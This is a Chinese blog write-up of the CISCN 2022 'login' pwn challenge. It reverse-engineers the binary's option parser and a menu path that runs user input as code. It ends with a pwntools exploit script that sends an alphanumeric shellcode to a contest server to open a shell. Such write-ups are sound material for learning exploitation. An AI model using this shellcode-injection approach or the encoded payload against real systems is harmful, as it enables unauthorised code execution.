CISCN2022_login

最新推荐文章于 2023-05-21 22:28:21 发布
最新推荐文章于 2023-05-21 22:28:21 发布
阅读量899 收藏
点赞数
分类专栏: pwnpwn 文章标签: pwn linux ubuntu python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51055545/article/details/125113703
版权

CISCN2022_login

例行检查

image-20220603160829184

上来就是保护机制全开,直接到IDA中分析;

逆向分析

main函数:

image-20220603160951088

程序主逻辑在sub_FFD函数中,

unsigned __int64 __fastcall sub_FFD(_BYTE *our_content)
{
  char *sa; // [rsp+8h] [rbp-48h]
  char *maohao_addr; // [rsp+8h] [rbp-48h]
  char *sc; // [rsp+8h] [rbp-48h]
  char *sd; // [rsp+8h] [rbp-48h]
  char v7; // [rsp+17h] [rbp-39h]
  int v8; // [rsp+1Ch] [rbp-34h]
  int v9; // [rsp+2Ch] [rbp-24h]
  void *dest; // [rsp+30h] [rbp-20h]
  char *s1; // [rsp+38h] [rbp-18h]
  char *nptr; // [rsp+40h] [rbp-10h]
  unsigned __int64 v13; // [rsp+48h] [rbp-8h]

  v13 = __readfsqword(0x28u);
  memset(qword_202040, 0, sizeof(qword_202040));// 对全局变量进行初始化
  v8 = 0;                                       // v8控制循环次数
  v7 = 0;
  dest = 0LL;
  while ( !*our_content || *our_content != '\n' && (*our_content != '\r' || our_content[1] != '\n') )// 没有输入,或者第一个字符是回车,并且我们的输入不为/r或/n,就往下进行
  {
    if ( v8 <= 5 )                              // 循环5次
      qword_202040[2 * v8] = our_content;       // 将我们的内容赋值给全局变量
    maohao_addr = strchr(our_content, ':');
    if ( !maohao_addr )                         // 如果我们的输入中不存在‘:’的话,就退出
    {
      puts("error.");
      exit(1);
    }
    *maohao_addr = 0;
    for ( sc = maohao_addr + 1; *sc && (*sc == ' ' || *sc == '\r' || *sc == '\n' || *sc == '\t'); ++sc )
      *sc = 0;                                  // 将冒号后的' ','\r','\n','\t'置为0
    if ( !*sc )                                 // 如果冒号后没值,就退出
    {
      puts("abort.");
      exit(2);
    }
    if ( v8 <= 5 )
      qword_202040[2 * v8 + 1] = sc;            // 将冒号后的地址赋给v8+1的指针
    sd = strchr(sc, '\n');                      // 在sc里检索回车
    if ( !sd )                                  // 没有的话就退出
    {
      puts("error.");
      exit(3);
    }
    *sd = 0;
    our_content = sd + 1;                       // 下一个回车后的地址赋值给our_content,作为我们的输入
    if ( *our_content == '\r' )
      *our_content++ = 0;                       // 如果our_content开头是'\r'的话,就置0
    s1 = (char *)qword_202040[2 * v8];          // s1为我们最开始的输入
    nptr = (char *)qword_202040[2 * v8 + 1];
    if ( !strcasecmp(s1, "opt") )
    {
      if ( v7 )
      {
        puts("error.");
        exit(5);
      }
      v7 = atoi(nptr);                          // 将nptr中的字符或整型类型转化为整型,作为下边的选择来进入不同的分支
    }
    else
    {
      if ( strcasecmp(s1, "msg") )
      {
        puts("error.");
        exit(4);
      }
      if ( strlen(nptr) <= 1 )
      {
        puts("error.");
        exit(5);
      }
      v9 = strlen(nptr) - 1;
      if ( dest )
      {
        puts("error.");
        exit(5);
      }
      dest = calloc(v9 + 8, 1uLL);
      if ( v9 <= 0 )
      {
        puts("error.");
        exit(5);
      }
      memcpy(dest, nptr, v9);
    }
    ++v8;
  }
  *our_content = 0;
  sa = our_content + 1;
  if ( *sa == 10 )
    *sa = 0;
  switch ( v7 )  //菜单
  {
    case 2:
      sub_DA8((const char *)dest);
      break;
    case 3:
      sub_EFE((const char *)dest);
      break;
    case 1:
      sub_CBD((const char *)dest);
      break;
    default:
      puts("error.");
      exit(6);
  }
  return __readfsqword(0x28u) ^ v13;
}

要正确输入进入程序的菜单确实需要逆向好一会儿(大牛轻点儿喷),下边就是对菜单的三个函数的分析了,

sub_DA8():

unsigned __int64 __fastcall sub_DA8(const char *a1)
{
  unsigned int v1; // eax
  size_t v2; // rax
  int i; // [rsp+14h] [rbp-2Ch]
  void *dest; // [rsp+18h] [rbp-28h]
  unsigned __int64 v6; // [rsp+28h] [rbp-18h]

  v6 = __readfsqword(0x28u);
  for ( i = 0; i < strlen(a1); ++i )
  {
    if ( !isprint(a1[i]) && a1[i] != 10 )
    {
      puts("oh!");
      exit(-1);
    }
  }
  if ( unk_202028 != 1 )   //先进行一个检查,如果unk_202028不等于1的话,就直接退出
  {
    puts("oh!");
    exit(-1);
  }
  if ( unk_202024 )    //unk_202028等于1,且unk_202024存在值,就会在下边调用shellcode
  {
    v1 = getpagesize();
    dest = (void *)(int)mmap((char *)&loc_FFE + 2, v1, 7, 34, 0, 0LL);
    v2 = strlen(a1);
    memcpy(dest, a1, v2);    //将我们的输入copy到dest中
    ((void (*)(void))dest)();   //对我们的输入进行调用
  }
  else
  {
    puts(a1);
  }
  return __readfsqword(0x28u) ^ v6;
}

这里就是很明显的一个写shellcode的地方,但存在检查机制;

sub_EFE():

unsigned __int64 __fastcall sub_EFE(const char *a1)
{
  int i; // [rsp+14h] [rbp-1Ch]
  unsigned __int64 v3; // [rsp+18h] [rbp-18h]

  v3 = __readfsqword(0x28u);
  for ( i = 0; i < strlen(a1); ++i )
  {
    if ( !isprint(a1[i]) && a1[i] != 10 )
    {
      puts("oh!");
      exit(-1);
    }
  }
  if ( !unk_202028 )
  {
    puts("oh!");
    exit(-1);
  }
  if ( !strcmp(a1, "eX1t") )
  {
    unk_202028 = 0;  //这里将unk_202028,unk_202024的值全赋值为0,
    unk_202024 = 0;
  }
  return __readfsqword(0x28u) ^ v3;
}

将以上两个全局变量赋值为0的操作是通不过刚才的检查机制的,

sub_CBD():

unsigned __int64 __fastcall sub_CBD(const char *a1)
{
  int i; // [rsp+14h] [rbp-1Ch]
  unsigned __int64 v3; // [rsp+18h] [rbp-18h]

  v3 = __readfsqword(0x28u);
  for ( i = 0; i < strlen(a1); ++i )
  {
    if ( !isprint(a1[i]) && a1[i] != 10 )
    {
      puts("oh!");
      exit(-1);
    }
  }
  if ( !strcmp(a1, "ro0t") )
  {
    unk_202028 = 1;
    unk_202024 = 1;
  }
  else
  {
    unk_202028 = 1;
  }
  return __readfsqword(0x28u) ^ v3;
}

这里选项1的话,就会进入到这个函数里,将unk_202028,unk_202024的值赋值为1,可以通过检查机制,

思路

我们先去调用选项1的函数,将unk_202028,unk_202024两个全局变量赋值为1,接着去调用选项2的函数,去执行shellcode,

exp

#!/usr/bin/env python
#coding=utf-8

from pwn import*
ip = "101.201.123.35"
port = 34973
io = remote(ip,port)
#io = process('./login')
elf = ELF('./login')
libc = elf.libc
context(log_level='debug',os='linux',arch='amd64')

#gdb.attach(io,'b *$rebase(0x146E)')

io.recvuntil(">>>")
io.sendline('opt:1\r\nmsg:ro0t\r\n')

shellcode = '''
Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t
'''

#gdb.attach(io,'b *$rebase(0xda8)')

io.recvuntil(">>>")
io.sendline('opt:2\r\nmsg:'+shellcode+'\r\n')

io.interactive()

image-20220603162722583
喜提flag!!!
大家觉得我的文章好的话就点点关注吧~
贴上我的博客

Leee333
关注
专栏目录
ciscn2022-线上-半决-pwn
m0_51185908的博客
09-13 1645
ciscn2022-线上-半决-pwn
mysql flask-login_Flask-Login用户登陆
weixin_32605973的博客
02-17 467
Flask-LoginFlask-Login 提供用户会话管理,处理常见的登录、退出和注册的任务。Flask-Login 没有绑定数据库,可以从数据库回调用户对象。安装flask-loginpip install flask-login结构|-- app/| |-- __init__.py| |-- forms.py| |-- models.py| |-- routes.py| ...
[CISCN 2022 初赛]login_normal
最新发布
Lt95625142的博客
05-21 476
CISCN 的一道(对我而言不)简单的pwn题。。。
ciscn login
m0_64195960的博客
03-20 1009
这是去年国赛一道签到题 当时没做出来 现在来复现一下。
ciscn 2022 华东北分区赛pwn blue
z1r0的博客
07-02 844
开了沙盒 最简单的解法还是借助environ来控制ret地址,然后将ret改成orw链即可。这一题的关键点在于怎么泄露出environ里面的栈地址,因为show功能只能使用一次。 这一题的漏洞点是一次性的uaf漏洞,在666功能下 我们首先先借助这一次性的uaf泄露出libc。还是填满tcache,只不过下一个进unsorted bin的时候利用666这个uaf功能。 接下来思考一下如何泄露出environ里面的值,show是一次性的已经用不了。仔细思考一下不难想出利用stdout来泄露,将flags
ciscn 2022 华中赛区 misc
wha1e的博客
07-28 586
ciscn 2022 华中赛区 misc
Cisco_IOS_.rar_Cisco_IOS_
09-14
**Cisco IOS基础知识** Cisco IOS(Internetwork Operating System)是Cisco公司为其网络设备开发的操作系统,主要用于路由器和交换机。这个操作系统提供了丰富的网络服务和管理功能,使得网络管理员能够配置、管理...
思科交换机_路由器配置命令大全.pdf
12-12
7. 允许登录:使用 `login` 命令允许登录。 8. 设置登录口令:使用 `password xx` 命令设置登录口令 xx。 交换机 VLAN 设置 1. 进入 VLAN 设置:使用 `vlan database` 命令进入 VLAN 设置。 2. 创建 VLAN:使用 `...
CIS_Cisco_IOS_15_Benchmark_v4.0.0.pdf
09-11
Cisco IOS 15.xx 的安全加固。 Table of Contents Table of Contents .........................................................................................................................................
华为交换机ssh思科交换机_思科交换机SSH登录配置
weixin_39917791的博客
12-20 807
SSH的优势在现在这个信息时代,网络安全变得越来越重要,当然路由器交换机作为数据传输的环节,安全性更为重要。现在的网络设备一般都是支持SSH和Telnet远程登录的,新设备一般默认建议SSH登录。Telnet是明文传送,SSH是密文传送,这是最主要的区别。SSH替代Telnet是趋势也是现实。在使用SSH的时候,一个数字证书将认证客户端(你的工作站)和服务器(你的网络设备)之间的连接,并加密受保护...
ciscn 2022 pwn-newest_note复现
qq_34010404的博客
06-01 735
刚开始有个溢出(太菜了,其他师傅提醒才看出来) del 函数里面 free之后指针没有清0 攻击思路: 如果elf里面使用了stdout,等,那么IO函数里面取到的stdout就是bss段上的stdout,否则就是libc里面的stdout。IO函数位于libc里面,libc里面有一处地方可以泄露elf基址(这段区域是只读的) 考虑alloc到heap数组上,然后修改成员为图中的地址,这样就可以leak elf的地址了(leak之后是为了后面修改free count做准备)。前提是得先leak lib
[CISCN2022] Duck-Wp
m0_46329041的博客
07-10 336
该题目附件我已经上传到Github,有需要的可以下载,复现这题时,我是使用的NSSCTF提供的远程环境。此题是一道libc2.34的题,libc2.34与2.33最大的不同就是移除了以往常用的malloc_hook,free_hook等hook函数,导致利用上较为困难,2.34与2.33一样,chunk的fd指针都采用了异或加密,在申请chunk时便会异或解密,所以当我们改写fd指针时,只需要将泄露出的堆的基地址右移12位后与当前地址异或即可。glibc中采用的异或加密的规则并不难:将堆的基地址右移12位后
2022 ciscn初赛 online_crt
l11III1111的博客
05-30 623
online_crt 题目给出附件先看app.py 给出了3个路由/getcrt是生成证书的路径暂时没看出有啥,然后就是createlink调用popen运行了c_rehash,看了一下是perl脚本,上网搜一下发现CVE-2022-1292,没有exp但是漏洞描述是当用户可控文件名时的命令注入,所以现在目标为控制文件名 再看到/proxy路由由用户构造报文,可以crlf,附件中还给了goserver看看源码 可以看到/admin/rename可以控制文件名称Request.URL.RawPath需要我
ciscn 2022 华东北分区赛pwn bigduck
z1r0的博客
07-01 772
这个是2.33下的,2.33下有free_hook 和 malloc_hook。这题开启了沙盒,禁用了execve 所以考虑orw攻击方法。这里有一个小坑点,2.33下通过unsorted bin泄露的时候,main_arena那里的低字节是\x00,所以直接show的话会show不出来。在show前利用edit将低字节改为\x01即可。最后算libc的时候 - 1即可。两种攻击思路,第一种借助environ泄露出stack然后改edit的ret为orw即可,第二种劫持hook为万能gadget(直接拿2
CISCN 2022 初赛 web 复现
shinygod的博客
11-17 1820
比赛复现
[CISCN 2022 东北]听说这是一个二维码
qq_47875210的博客
12-03 791
复现过程如下: 得到密码:Sound from deep --> ,想到工具,拖到工具中,提示输入密码,密码为0和255,可以代表0或者1,所以写个代码,提取一下所有的ip,然后得到二进制字符串 运行后,得到,现在是2进制转图片了,这一步毕竟简单,实现代码如下: 运行效果: 可以看到这两个,比较像,使用在线网站:戳我打开!flag{c736863427be5671102c039d43f0c75b}
[2022 CISCN]初赛 web题目复现
cosmoslin的博客
07-04 4258
源码泄露www.zip,用网上的链子直接打 online_crt 考点:CVE-2022-1292SSRF项目后端为python+go,其中python部署在外网,go通过python转发到内网先看python,一共有四个路由:为主界面生成一个x509证书调用c_rehash创建证书链接通过代理访问go内网服务再来看go,有一个admin路由,用以重命名证书文件题目的考点为CVE-2022-1292,是c_rehash的一个命令注入漏洞c_rehash是openssl中的一个用perl编写的脚本工具,用于批
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2301
2022 CISCN 初赛pwn的完整wp
2022 CISCN全国初赛-wp
qq_45603443的博客
05-30 2051
2022 CISCN全国初赛-wpWebEzpoponline_crtMiscez_usbCrypto签到基于挑战码的双向认证基于挑战码的双向认证2基于挑战码的双向认证3Pwnpwn1重点来了 Web Ezpop <?php namespace think{ abstract class Model{ private $lazySave = false; private $data = []; private $exists = false; protected $table; private $wi
Cisco IOS基础命令详解与配置指南
"Cisco_IOS 基本命令集用于查看和配置Cisco IOS设备的基本操作,包括检查路由器状态、配置网络、设置接口、管理路由以及进行通信验证。" Cisco IOS是Cisco公司开发的操作系统,用于其网络设备,如路由器和交换机。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值